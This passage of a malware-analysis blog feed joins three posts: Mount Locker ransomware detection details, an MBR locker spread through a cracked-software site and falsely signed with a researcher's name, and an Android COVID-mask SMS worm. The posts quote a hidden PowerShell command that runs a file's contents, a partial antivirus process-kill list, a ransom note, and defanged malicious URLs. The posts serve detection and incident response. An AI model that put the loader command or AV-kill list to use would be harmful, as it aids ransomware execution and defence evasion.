<p><br></p>
<h1><strong>Conclusion / Key Takeaways</strong></h1>
<ul>
<li>Up until now only Mount Locker V2 x86 binaries have been submitted to analysis platforms in a packed state. Similar to other Ransomware Gangs they opted to deliver their x64 executables as DLLs.</li>
<li>No Obfuscation beyond the initial packing</li>
<li>No Persistence Methods used</li>
<li>Depending on the Users permissions: Mount Locker either fails to delete Shadow Copies and files on other drives or it will encrypt critical system components and render the system unusable after a reboot</li>
<li>Multiple features are not implemented in Version 2</li>
</ul>
<p>The Operators behind Mount Locker are obviously just starting out, as the observed Ransomware samples are still very verbose and noisy on execution. Although the are not nearly as active as a lot of other well established Crimeware Groups, I expect to see more attacks from them in the upcoming year 2021. I hope this blog post will be somewhat helpful in future investigations on this Ransomware strain and of course I will be keeping up with it as well.</p>
<p><br></p>
<p><center><b>Alright, that's it for now. Thank you for reading this blog post! If you have got any feedback please let me know and don't miss the Yara Rule, Mitre Att&ck List and IoCs below π€ See ya in 2021 π</b></center></p>
<p><center><img width="50%" height="50%" src="https://dissectingmalwa.re/img/borat.gif"></center></p>
<p><br></p>
<h2><strong>Yara Rule</strong></h2>
<div class="highlight"><pre><span></span><span class="kn">import</span> <span class="s2">"pe"</span>
<span class="n">rule</span> <span class="n">RANSOM_MountLocker_V2</span> <span class="p">{</span>
<span class="n">meta</span><span class="p">:</span>
<span class="n">description</span> <span class="o">=</span> <span class="s2">"Detects Mount Locker Ransomware, Version 2 x86 unpacked"</span>
<span class="n">author</span> <span class="o">=</span> <span class="s2">"Marius 'f0wL' Genheimer <hello@dissectingmalwa.re>"</span>
<span class="n">reference</span> <span class="o">=</span> <span class="s2">"https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html"</span>
<span class="n">date</span> <span class="o">=</span> <span class="s2">"20.12.2020"</span>
<span class="n">tlp</span> <span class="o">=</span> <span class="s2">"WHITE"</span>
<span class="n">hash1</span> <span class="o">=</span> <span class="s2">"226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2"</span>
<span class="n">hash2</span> <span class="o">=</span> <span class="s2">"e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037"</span>
<span class="n">strings</span><span class="p">:</span>
<span class="o">//</span><span class="n">picks</span> <span class="n">up</span> <span class="n">on</span> <span class="n">the</span> <span class="n">Volume</span> <span class="n">Serial</span> <span class="n">Number</span> <span class="n">Permutation</span> <span class="ow">in</span> <span class="n">function</span> <span class="n">mw_mutex</span>
<span class="err">$</span><span class="n">mutex_shift</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">8</span><span class="n">b</span> <span class="n">c1</span> <span class="n">c1</span> <span class="n">c8</span> <span class="err">??</span> <span class="mi">50</span> <span class="mi">8</span><span class="n">b</span> <span class="n">c1</span> <span class="n">c1</span> <span class="n">c8</span> <span class="err">??</span> <span class="mi">50</span> <span class="mi">8</span><span class="n">b</span> <span class="n">c1</span> <span class="n">c1</span> <span class="n">c8</span> <span class="err">??</span> <span class="mi">50</span> <span class="mi">51</span><span class="p">}</span>
<span class="err">$</span><span class="n">x1</span> <span class="o">=</span> <span class="s2">"powershell.exe -windowstyle hidden -c $mypid='</span><span class="si">%u</span><span class="s2">';[System.IO.File]::ReadAllText('</span><span class="si">%s</span><span class="s2">')|iex"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="o">//</span><span class="err">$</span><span class="n">x2</span> <span class="o">=</span> <span class="s2">"explorer.exe RecoveryManual.html"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">x2</span> <span class="o">=</span> <span class="s2">"RecoveryManual.html"</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">x3</span> <span class="o">=</span> <span class="s2">"expand 32-byte k"</span> <span class="n">fullword</span> <span class="n">ascii</span>
<span class="err">$</span><span class="n">x4</span> <span class="o">=</span> <span class="s2">"<b>/!</span><span class="se">\\</span><span class="s2"> YOUR NETWORK HAS BEEN HACKED /!</span><span class="se">\\</span><span class="s2"><br>"</span> <span class="n">fullword</span> <span class="n">ascii</span>
<span class="err">$</span><span class="n">s1</span> <span class="o">=</span> <span class="s2">"[SKIP] locker.volume.enum > readonly name=</span><span class="si">%s</span><span class="s2">"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">s2</span> <span class="o">=</span> <span class="s2">"[WARN] locker.dir.check > get_reparse_point gle=</span><span class="si">%u</span><span class="s2"> name=</span><span class="si">%s</span><span class="s2">"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">s3</span> <span class="o">=</span> <span class="s2">"[ERROR] locker.file > get_size gle=</span><span class="si">%u</span><span class="s2"> name=</span><span class="si">%s</span><span class="s2">"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="err">$</span><span class="n">s4</span> <span class="o">=</span> <span class="s2">"[OK] locker > finished"</span> <span class="n">fullword</span> <span class="n">wide</span>
<span class="n">condition</span><span class="p">:</span>
<span class="n">uint16</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0x5a4d</span> <span class="ow">and</span> <span class="n">filesize</span> <span class="o"><</span> <span class="mi">600</span><span class="n">KB</span>
<span class="ow">and</span> <span class="n">pe</span><span class="o">.</span><span class="n">imphash</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"1ea39e61089a4ea253fb896bbcf01be5"</span>
<span class="ow">and</span> <span class="err">$</span><span class="n">mutex_shift</span>
<span class="ow">and</span> <span class="mi">2</span> <span class="n">of</span> <span class="p">(</span><span class="err">$</span><span class="n">x</span><span class="o">*</span><span class="p">)</span>
<span class="ow">and</span> <span class="mi">2</span> <span class="n">of</span> <span class="p">(</span><span class="err">$</span><span class="n">s</span><span class="o">*</span><span class="p">)</span>
<span class="p">}</span>
</pre></div>
<p><br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><a href="https://attack.mitre.org/techniques/T1012/"><em>T1012</em></a> --> Query Registry --> Discovery</p>
<p><a href="https://attack.mitre.org/techniques/T1027/"><em>T1027</em></a> --> Obfuscated Files or Information --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1055/"><em>T1055</em></a> --> Process Injection --> Privilege Escalation, Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1059/"><em>T1059</em></a> --> Command and Scripting Interpreter: PowerShell --> Execution</p>
<p><a href="https://attack.mitre.org/techniques/T1070/"><em>T1070</em></a> --> Indicator Removal on Host: File Deletion --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1076/"><em>T1076</em></a> --> Remote Desktop Protocol --> Lateral Movement</p>
<p><a href="https://attack.mitre.org/techniques/T1082/"><em>T1082</em></a> --> System Information Discovery --> Discovery</p>
<p><a href="https://attack.mitre.org/techniques/T1083/"><em>T1083</em></a> --> File and Directory Discovery --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1112/"><em>T1112</em></a> --> Modify Registry --> Defense Evasion</p>
<p><a href="https://attack.mitre.org/techniques/T1129/"><em>T1129</em></a> --> Shared Modules --> Execution</p>
<p><a href="https://attack.mitre.org/techniques/T1134/"><em>T1134</em></a> --> Access Token Manipulation --> Defense Evasion, Privilege Escalation</p>
<p><a href="https://attack.mitre.org/techniques/T1486/"><em>T1486</em></a> --> Data Encrypted for Impact --> Impact</p>
<p><a href="https://attack.mitre.org/techniques/T1489/"><em>T1489</em></a> --> Service Stop --> Impact</p>
<p><a href="https://attack.mitre.org/techniques/T1490/"><em>T1490</em></a> --> Inhibit System Recovery --> Impact</p>
<p><a href="https://attack.mitre.org/techniques/T1546/"><em>T1546</em></a> --> Event Triggered Execution: Change Default File Association --> Privilege Escalation, Persistence</p>
<p><a href="https://attack.mitre.org/techniques/T1562/"><em>T1562</em></a> --> Impair Defenses: Disable or Modify Tools --> Defense Evasion</p>
<p><br></p>
<p><br></p>
<h2><strong>IOCs</strong></h2>
<h3>Mount Locker</h3>
<div class="highlight"><pre><span></span><span class="k">Version</span> <span class="mi">1</span>
<span class="n">f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963</span>
<span class="k">Version</span> <span class="mi">2</span>
<span class="mi">32</span><span class="o">-</span><span class="nb">bit</span>
<span class="mi">226</span><span class="n">a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2</span>
<span class="n">e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037</span>
<span class="mi">64</span><span class="o">-</span><span class="nb">bit</span>
<span class="mi">2</span><span class="n">d2d2e39ccae1ff764e6618b5d7636d41ac6e752ce56d69a9acbb9cb1c8183d0</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="p">[</span><span class="mi">8</span><span class="o">-</span><span class="n">digit</span> <span class="n">hex</span><span class="p">].</span><span class="n">bat</span> <span class="o">-</span> <span class="n">Batch</span> <span class="n">script</span>
<span class="o">~</span><span class="p">[</span><span class="mi">9</span><span class="o">-</span><span class="n">digit</span> <span class="nb">int</span><span class="p">].</span><span class="n">tmp</span> <span class="o">-</span> <span class="n">Powershell</span> <span class="n">script</span>
<span class="c1">--> both of these files will be dropped in C:\Users\username\AppData\Local\Temp\</span>
<span class="n">RecoveryManual</span><span class="p">.</span><span class="n">html</span>
</pre></div>
<h3>Onion URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">mountnewsokhwilx</span><span class="p">[.]</span><span class="n">onion</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">zsa3wxvbb7gv65wnl7lerslee3c7i27ndqghqm6jt2priva2qcdponad</span><span class="p">[.]</span><span class="n">onion</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">soxbhgx23tabwh2k447b2tljcu5tktdc2elmi2ls7huzntrhknygxsqd</span><span class="p">[.]</span><span class="n">onion</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">lhvqpdydwvtgy2ficsvamluobvonnitji5jgpfvc7c5pj6ci35gurjyd</span><span class="p">[.]</span><span class="n">onion</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">4</span><span class="n">bt5hu4vid5c7uq4ioszgzwi4ix6qon7a226cxowgrnomfgxl5b3wtid</span><span class="p">[.]</span><span class="n">onion</span>
</pre></div>
<p><br></p>The Blame Game - About False Flags and overwritten MBRs2020-04-13T00:00:00+02:002020-04-13T00:00:00+02:00f0wLtag:dissectingmalwa.re,2020-04-13:/the-blame-game-about-false-flags-and-overwritten-mbrs.html<p>MBR Lockers have become popular again with Skids. Let's look at a sample that was spread yesterday and caught a lot of attention.</p><p>Let's start right off with a short introduction: The Malware analyzed here is a so-called MBR (Master Boot Record) Locker. It is targeting (like most of the time) only PCs running Windows. The good news is: in this case there is neither encryption nor deletion happening on the file system so there's a good chance for victims to recover their files. A possible mitigation for suers woulds be running <a href="https://talosintelligence.com/mbrfilter">MBRFilter</a> which is developed by Talos Intelligence. Now to the Message displayed in the VM below: Pressing CTRL+ALT+ESC for a possible bypass / failsafe to boot the OS (described in this <a href="https://www.bleepingcomputer.com/news/security/new-wiper-malware-impersonates-security-researchers-as-prank/">BleepingComputer</a> article) doesn't seem to work for this sample.</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/vkwiper-vm1.png"></center></p>
<p>After Vitali published the tweet below a whole crowd formed in the emerging thread to please unlock their PCs. Both Vitali Kremez and MalwareHunterTeam made it clear multiple times that they are not affiliated with this campaign in any way, but some of the victims still seemed to miss this fact and got quite worked up about their PCs being compromised. Unfortunately this was not the first and won't be the last time that respected ethical researchers are targeted in such decreditation acts. I'm not qualified to talk about any psychological reasoning behind such actions, but it's either an attempt to a Denial of Service (Vitalis Twitter DMs and Mentions were filled with complaints and accusations) or looking for attention (not in this case because there were no hints on the malware actors) like the <a href="https://twitter.com/CryptoInsane/status/1222907566365257729">Maze Team</a>.</p>
<p><br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">[*] Beware: Some scams utilize my name and impersonate myself to amplify extortions. <a href="https://t.co/wk9Mxkqxpz">pic.twitter.com/wk9Mxkqxpz</a></p>— Vitali Kremez (@VK_Intel) <a href="https://twitter.com/VK_Intel/status/1249149943702568960?ref_src=twsrc%5Etfw">April 12, 2020</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p><br></p>
<p>After talking to a victim to clarify the infection method and origin of the malware I received a link to this pirated Version of Adobe Illustrator. Lures like this one are often trojanized with malware or straight-up malicious from the start like in this case. Obviously this cannot be considered common knowledge for every user and this is what criminals are taking advantage of for years and years to come.</p>
<p><br></p>
<p><center><img alt="Source Website" src="https://dissectingmalwa.re/img/vkwiper-crackedion.png"></center></p>
<p><br></p>
<p>A quick check confirmed my suspicion that every download on this site is "spiked" with malware. The Filenames of the executables contain a unique-per-download string. The victim will be redirected to a second site where a user agent check for Windows and matching Browsers (IE, Edge) is performed. The executable is downloaded from another URL from a directory called <strong>ru53332</strong> which might give us a hint as to where the malware originated from (this looks like a client subfolder, this host might spread other strains as well).</p>
<p><br></p>
<p><center><img alt="Tree" src="https://dissectingmalwa.re/img/vkwiper-tree.png"></center></p>
<p><br></p>
<p>Below you can see a process graph of the Glupteba Infection generated by Any.Run. This is just a subsection of the whole graph and since there was so much going on it was pretty difficult to make out if the MBR Locker actually was delivered with this installer. None of my tests in VMs or on a physical test machine resulted in a corrupted MBR, so at the moment I can neither confirm nor deny that the Locker was actually delivered via crackedion[.]com.</p>
<p><br></p>
<p><center><img alt="Process Graph" src="https://dissectingmalwa.re/img/vkwiper-pgraph.png"></center></p>
<p><br></p>
<p>Interestingly all the executables named WinmonX.sys had broken certificate chains which should be a red flag for AVs running on the vicitims system. There were startup tasks scheuduled for all three of these files.</p>
<p><center><img alt="Certificate Verification" src="https://dissectingmalwa.re/img/vkwiper-winmoncert.png"></center></p>
<p><br></p>
<p>WinMonProcessManager contains a list of ca. 600 Anti-Virus executable names and it's only purpose is to disable all AV services while the trojan does its "magic":
<br></p>
<div class="highlight"><pre><span></span><span class="n">exantivirus</span><span class="o">-</span><span class="n">cnet</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">zonealarm</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">ldnetmon</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">norton_internet_secu_3</span><span class="p">.</span><span class="mi">0</span><span class="n">_407</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">antivirus</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">netmon</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">AvastPE2</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">avast_free_antivirus_setup_online</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">EmsisoftAntiMalwareSetup</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">drweb32</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">nod32</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">f</span><span class="o">-</span><span class="n">prot95</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">f</span><span class="o">-</span><span class="n">prot</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">drwebupw</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">AvastUI</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">mcshield</span><span class="p">.</span><span class="n">exe</span> <span class="p">...</span> <span class="k">and</span> <span class="n">so</span> <span class="k">on</span> <span class="err">π</span>
</pre></div>
<p><br></p>
<p>The Detection Signatures from different engines on VT and the Intezer Analysis declared the dropped executables as parts of the Glupteba Trojan, which has been around for some time now. Additionally there were hints to another Strain called RanumBot that I have not ivestigated further up until now. In the screenshot you can see the <strong>windefender.exe</strong> sample that was submitted to Intezer. It was written in Go, packed with UPX and was stuffed with strings. I did not investigate this executable further, but at first I thought that this could have been the MBR Locker because it contains strings related to Poly1305/ChaCha20.</p>
<p><br></p>
<p><center><img alt="Intezer" src="https://dissectingmalwa.re/img/vkwiper-glupteba.png"></center></p>
<p><br></p>
<p>To show the effect of the MBR Locker on the OS Drive I simply used a live system to write the first sector of the Disk to a file ( <em>sudo dd if=/dev/sdX of=mbrdump.bin bs=512 count=1</em> ). The top dump shows the standard MBR contents and below is the corrupted version displaying only the message to the user.</p>
<p><br></p>
<p><center><img alt="Good MBR" src="https://dissectingmalwa.re/img/vkwiper-mbrg.png"></center>
<center><img alt="Overwritten MBR" src="https://dissectingmalwa.re/img/vkwiper-mbrc.png"></center></p>
<p><br></p>
<p>Reading the imports with Rabin2 there's nothing out of the ordinary, but there are a few things I wanted to see here. I expected to see CreateFile, which would be used to write the MBR Text playload to the first sector of the disk (<strong>\\.\PhysicalDrive0</strong>) later. Unlike Petya, which checked whether the PartitionStyle of the drive is actually an MBR (via DeviceIoControl), this MBR Locker isn't too concerned about that. There is also some generic anti-debugging via IsDebuggerPresent, but I didn't expect any further measures since the overall design of the malware is very poor.</p>
<p><br></p>
<p><center><img alt="Imports" src="https://dissectingmalwa.re/img/vkwiper-rabin2.png"></center></p>
<p><br></p>
<p>Taking a look at the sections of the binary we can spot a <em>.upx</em> section. This looks suspicious because a sample packed with UPX would have three sections named upx0 (packed), upx1 (stub) and optionally upx2 (unpacked) like in the image below.</p>
<p><br></p>
<p><center><img alt="Sections" src="https://dissectingmalwa.re/img/vkwiper-sections.png"></center></p>
<p><center><img alt="UPX" src="https://dissectingmalwa.re/img/vkwiper-whatupxlookslike.png"></center></p>
<p><br></p>
<p>Printing the contents of the <strong>.upx</strong> section we can see that the text payload is encrypted.</p>
<p><br></p>
<p><center><img alt="Overwritten MBR" src="https://dissectingmalwa.re/img/vkwiper-upx2.png"></center></p>
<p><br></p>
<p>The decryption routine is found very quickly since the executable only contains three functions in total. As one might have guessed already the text payload is XORed and therefore has to be decrypted before writing to the MBR. The screenshot below shows the decryption function and south of that you can see the text extraction out of the <strong>.upx</strong> section we discussed earlier.</p>
<p><br></p>
<p><center><img alt="XOR Decryption Function" src="https://dissectingmalwa.re/img/vkwiper-xor.png"></center></p>
<p><center><img alt="Reading the ciphertext out of .upx" src="https://dissectingmalwa.re/img/vkwiper-radare-upx.png"></center></p>
<p><br></p>
<p>The good-ish news is, that in this case the changes made to the Master Boot Record are reversible with a Backup of the MBR Sector. Alternatively victims can try to repair the MBR with Microsoft's <em>bootrec /fixmbr and /fixboot</em>. Sucess in this case depends on the partition style of the Windows install (since the MBR in GPT layouts is reserved for protective Reasons; on MBR installs bootrec may not be able to recover the Partition table because the whole sector is overwritten. See Vitalis Tweet <a href="https://twitter.com/VK_Intel/status/1249724110663532546">here</a>). I verified on a physical GPT install that LBA 1 and following is not affected by the MBRLocker and should keep the GPT recoverable. <a href="https://www.cgsecurity.org/wiki/TestDisk">TestDisk</a> is theoretically capable of recovering both partitioning layouts. I'd advise victims to use File Recovery software like <a href="https://www.cgsecurity.org/wiki/PhotoRec">Photorec</a> as an option for data recovery if a clean install is necessary.</p>
<p>In one case a victim contacted me about an additional STOP Ransomware Infection (.mpaj extension, online keyed), but at the moment I can't confirm that this incident happend in conjunction with the pirated Software Installer / MBRLocker.</p>
<p><br></p>
<p><center><b>As there is currently no public sample of the second version of the MBR Locker I will update this article once it is available. Stay tuned :)</b></center></p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1059</em> --> Command-Line Interface --> Execution</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>VK-Wiper MBR Locker</h3>
<div class="highlight"><pre><span></span><span class="gh">Glupteba related:</span>
<span class="gh">=================</span>
Adobe+Illustrator+CS6+Full+Crack+With+Serial+Keygen+{Latest+2019}+Free-UNIQUESTRING.exe --> SHA256: 5e00e50d04130b470825d6c1bd58542d32a0a4f52c4d6e6ff01ea1cfad8fce3e
SSDEEP: 98304:luH/zVSNmGHjYKNC/qPqaMy25WJTZsRvO6Y:8HBymGDY/O4ikvO
windefender.exe --> SHA256: 28e8776a07789daf08629815da0a6eb69613410912447c189a51002f54d956ca
SSDEEP: 49152:mFeWvXwa1xkJrwBskK0CCD/ozKc3k8HxmYfJpz4U+TiAGTeI6h6gHquAb7/i:CvXwaerwBIbKcrxmYfJF45SV/i
Winmon.exe --> SHA256: 889fb266c4c01bb4ef67635249c8daeb641fc86ce62fc280b34beec415fb6129
SSDEEP: 96:/XAUM8mqN18vwLvVfjm3ZAeyRYOiRIfad/WrJ37CgES:7pNuv2LSZA1fEWrR7vES
WinmonFS.exe --> SHA256: eb0be2ac3833c843214a55b14c31125a7b600d5272bdf322c4871f42627576e4
SSDEEP: 384:WVYr1nH9XRl8iueNYUaNhuqO3t6PsPJVPswHEvDdvHqciss+E96Vg:vrRlFpaNhuqO3njovpPTtTK
WinmonProcessMonitor.exe --> SHA256: f609c6656a0c451dafa5173df0cd848f7cb7f22c4f150f8d16716c12593de66c
SSDEEP: 384:s+B62cfu4RaQNDEiULv/oGUOY1wR7OLwOMEP5PkdkQE:sOmu4RLNAiUL/oGGS7OLDP5PkdkQE
<span class="gh">MBR Locker V1:</span>
<span class="gh">==============</span>
sentinelone.scr --> SHA256: 4cd23a989a8f196b1f49e5e66c6ecfa0cebf63f04950ae4d64127aaedda9e89c
SSDEEP: 48:Zvt+BLdtWU2ew9FRCfH8BArSXXmzdh4vMASG2HvzqEsG8V:Z1+9dtWU2ew9rC/8Kiidh4vMASNHvzB
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">crackedion</span><span class="p">[.]</span><span class="n">com</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">dataf0ral1</span><span class="p">[.]</span><span class="n">com</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">1</span><span class="n">podcast</span><span class="p">[.]</span><span class="n">best</span><span class="o">/</span><span class="n">ru53332</span><span class="o">/</span>
</pre></div>
<h3>Ransomnote V1</h3>
<div class="highlight"><pre><span></span><span class="o">~</span><span class="nv">SentinelOne</span> <span class="nv">Labs</span> <span class="nv">Ransomware</span><span class="o">~</span>
<span class="nv">Your</span> <span class="nv">system</span> <span class="nv">was</span> <span class="nv">unprotected</span>, <span class="nv">so</span> <span class="nv">we</span> <span class="nv">locked</span> <span class="nv">down</span> <span class="nv">access</span> <span class="nv">to</span> <span class="nv">Windows</span>.
<span class="nv">You</span> <span class="nv">need</span> <span class="nv">to</span> <span class="nv">buy</span> <span class="nv">SentinelOne</span> <span class="nv">antivirus</span> <span class="nv">in</span> <span class="nv">orer</span> <span class="nv">to</span> <span class="nv">restore</span> <span class="nv">your</span> <span class="nv">computer</span>.
<span class="nv">My</span> <span class="nv">name</span> <span class="nv">is</span> <span class="nv">Vitali</span> <span class="nv">Kremez</span>. <span class="nv">Contacts</span> <span class="nv">are</span> <span class="nv">below</span>.
<span class="nv">Phone</span>: [<span class="nv">Redacted</span>]
<span class="nv">E</span><span class="o">-</span><span class="nv">mail</span> <span class="mi">1</span>: [<span class="nv">Redacted</span>]
<span class="nv">E</span><span class="o">-</span><span class="nv">mail</span> <span class="mi">2</span>: [<span class="nv">Redacted</span>]
<span class="nv">After</span> <span class="nv">you</span> <span class="nv">buy</span> <span class="nv">my</span> <span class="nv">antivirus</span> <span class="nv">I</span> <span class="nv">will</span> <span class="k">send</span> <span class="nv">you</span> <span class="nv">unlock</span> <span class="nv">code</span>.
<span class="nv">Enter</span> <span class="nv">Unlock</span> <span class="nv">code</span>:
</pre></div>
<p></br></p>Jamba Superdeal: Helo Sir, you want to buy mask? - Corona Safety Mask SMS Scam2020-03-20T00:00:00+01:002020-03-20T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-03-20:/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html<p>As if there wasn't enough pain and suffering in the world already because of COVID-19 some criminals still try to piggyback on the fear of others. A quick look at an Andorid SMS "Worm".</p><p>Since the current COVID-19 outbreak is getting masively taken advantage of by various cybercriminals I thought it would be a good opportunity to try out Android reverse engineering. Let's dive right in:</p>
<p><br></p>
<p><center><img alt="Webpage" src="https://dissectingmalwa.re/img/csm-web.png"></center></p>
<p><br></p>
<p>The following dynamic part of this analysis was done in VirtualBox with the most recent Version of <a href="https://www.android-x86.org/">Android-x86</a>. For those playing along at home: The Setup is really simple (as Live Booting is sufficient). Just remember to crank up the Video Memory, change the Graphics Controler to <strong>VBoxVGA</strong> and enable 3D Acceleration as otherwise the VM will only boot to a command prompt.</p>
<p><center><img alt="Installation" src="https://dissectingmalwa.re/img/csm-vbox.png"></center></p>
<p><br></p>
<p>During the installation process there are no permissions to be granted to it.</p>
<p><center><img alt="Installation" src="https://dissectingmalwa.re/img/csm-install.png"></center></p>
<p><br></p>
<p>Before finishing the installation there is a Google Play Protect warning already. I'm not sure if this is a signature based detection or actually based on the expected behaviour while parsing the package. I'll install it anyway.</p>
<p><center><img alt="Google Play Protect" src="https://dissectingmalwa.re/img/csm-playprot.png"></center></p>
<p><br></p>
<p>After opening "Corona Safety Mask" for the first time it will ask for the permission to access the user's address book.</p>
<p><center><img alt="Contacts Permissions" src="https://dissectingmalwa.re/img/csm-contacts.png"></center></p>
<p><br></p>
<p>And secondly it requires the permission to send SMS messages as well. This should be a red flag to users in general if the request is made without any notice as to why this permission is required (e.g. a second factor authentication). Scams like this can get very expensive for the user which is probably also one of the major goals of this malware.</p>
<p><center><img alt="SMS Permissions" src="https://dissectingmalwa.re/img/csm-sms.png"></center></p>
<p><br></p>
<p>Below you can see the main (and only) view of the app. Questionable content, more typos... red flags everywhere, but some people might just be desperate enough to fall for it.</p>
<p><center><img alt="App" src="https://dissectingmalwa.re/img/csm-app.png"></center></p>
<p><br></p>
<p>For static analysis of the apk File I'll be using jadx-GUI. Below you can find the Github Repository. </p>
<p><center><div class="github-card" data-github="skylot/jadx" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><br></p>
<p>It works very well for my purposes here and it even has a dark mode π</p>
<p><center><img alt="Jadx Decompiler" src="https://dissectingmalwa.re/img/csm-jadx.png"></center></p>
<p><br></p>
<p>Upon tapping the <em>"Get Safety Mask"</em> button in the app it will direct you to a second website called Masksbox which might be part of a larger scam setup.</p>
<p><center><img alt="Weblink" src="https://dissectingmalwa.re/img/csm-weblink.png"></center></p>
<p><br></p>
<p>When I visited the page this morning it was displaying this downtime message. A quick check via archive.org didn't return a recent snapshot of the page.</p>
<p><center><img alt="Masksbox down" src="https://dissectingmalwa.re/img/csm-masksbox.png"></center></p>
<p><br></p>
<p>A few hours later the website was back up with a partialy configured Wordpress CMS. The Navbar makes it quite obvious that the page is still being built.</p>
<p><br></p>
<p><center><img alt="Masksbox" src="https://dissectingmalwa.re/img/csm-maskbox.png"></center></p>
<p><br></p>
<p>Of course there can't be a malware sample without at least one funny typo. Here we can also see that the app is using the EasyPermissions wrapper library to handle contacts and SMS functionality.</p>
<p><center><img alt="Permissions Typo" src="https://dissectingmalwa.re/img/csm-perm.png"></center></p>
<p><br></p>
<p>This section of the code is responsible for reading the contents of the victims address book and writing them to a list. </p>
<p><center><img alt="Reading Contacts" src="https://dissectingmalwa.re/img/csm-readcont.png"></center></p>
<p><br></p>
<p>Depending on the size of the contacts list it will either start at a random index and work its way up if there are over 100 contacts in the list or it will just send a SMS to all contacts if there are less than 100 in the list.</p>
<p><center><img alt="Webpage" src="https://dissectingmalwa.re/img/csm-send.png"></center></p>
<p><br></p>
<p>Lastly we can take a look at the signature of the APK. It was signed with the CN "Hemant Prajapat", but that is a fake name for sure. Other than that there's not much interesting info to get from this.</p>
<p><center><img alt="APK Signing" width="600px" height="313px" src="https://dissectingmalwa.re/img/csm-cert.png"></center></p>
<p><br></p>
<p>And that's it! In times like this it is especially important to keep your means of communication safe, so better be extra careful. Stay home, stay safe (on the interwebs) and most importantly: stay healthy (applies to you and your devices).</p>
<h2><em>IOCs</em></h2>
<h3>CoronaSafetyMask</h3>
<div class="highlight"><pre><span></span><span class="n">CoronaSafetyMask</span><span class="p">.</span><span class="n">apk</span> <span class="c1">--> SHA256: 8a87cfe676d177061c0b3cbb9bdde4cabee0f1af369bbf8e2d9088294ba9d3b1</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">24576</span><span class="p">:</span><span class="n">KjQEzqDqCXaTJwv2AbxMHKR</span><span class="o">+</span><span class="n">ZCGPEmD8oJxmLaRyiLQuZgvNwN</span><span class="p">:</span><span class="n">wqDjaNcdRNw8</span><span class="o">+</span><span class="n">xm2RFEuZgvNk</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">coronasafetymask</span><span class="p">[.]</span><span class="n">tk</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">masksbox</span><span class="p">[.]</span><span class="n">com</span>
</pre></div>
